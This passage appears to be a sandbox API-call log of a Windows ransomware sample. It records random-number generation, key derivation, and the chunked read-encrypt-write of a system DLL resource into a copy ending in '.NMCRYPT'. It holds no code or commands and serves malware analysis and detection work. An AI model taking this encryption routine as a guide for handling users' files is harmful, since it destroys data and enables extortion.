dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.585] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.585] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.585] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0153.585] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.585] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad7f8) returned 1 [0153.585] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0153.585] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0153.585] wcslen (_String="\\\\?\\") returned 0x4 [0153.586] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad178) returned 1 [0153.586] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0153.586] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0153.598] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=25600) returned 1 [0153.598] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0153.598] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.600] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.600] GetLastError () returned 0x0 [0153.600] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.600] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.601] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.601] GetLastError () returned 0x0 [0153.601] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.601] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.601] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.601] GetLastError () returned 0x0 [0153.601] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.601] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.601] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.601] GetLastError () returned 0x0 [0153.601] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.601] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.601] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.601] GetLastError () returned 0x0 [0153.601] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.601] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.601] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.601] GetLastError () returned 0x0 [0153.601] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.601] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.601] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.601] GetLastError () returned 0x0 [0153.601] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.601] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.602] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.602] GetLastError () returned 0x0 [0153.602] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.602] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.602] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.602] GetLastError () returned 0x0 [0153.602] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.602] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.602] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.602] GetLastError () returned 0x0 [0153.602] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.602] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.602] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.602] GetLastError () returned 0x0 [0153.602] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.602] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.602] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.602] GetLastError () returned 0x0 [0153.602] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.602] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.602] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.602] GetLastError () returned 0x0 [0153.602] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.602] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.602] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.602] GetLastError () returned 0x0 [0153.602] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.603] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.603] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.603] GetLastError () returned 0x0 [0153.603] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.603] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.603] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.603] GetLastError () returned 0x0 [0153.603] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.603] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.603] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.603] GetLastError () returned 0x0 [0153.603] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.603] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.603] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.603] GetLastError () returned 0x0 [0153.603] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.603] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.603] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.603] GetLastError () returned 0x0 [0153.603] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.603] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.603] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.603] GetLastError () returned 0x0 [0153.603] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.604] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.604] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.604] GetLastError () returned 0x0 [0153.604] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.604] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.604] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.604] GetLastError () returned 0x0 [0153.604] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.604] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.604] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.604] GetLastError () returned 0x0 [0153.604] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.604] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.604] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.604] GetLastError () returned 0x0 [0153.604] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | 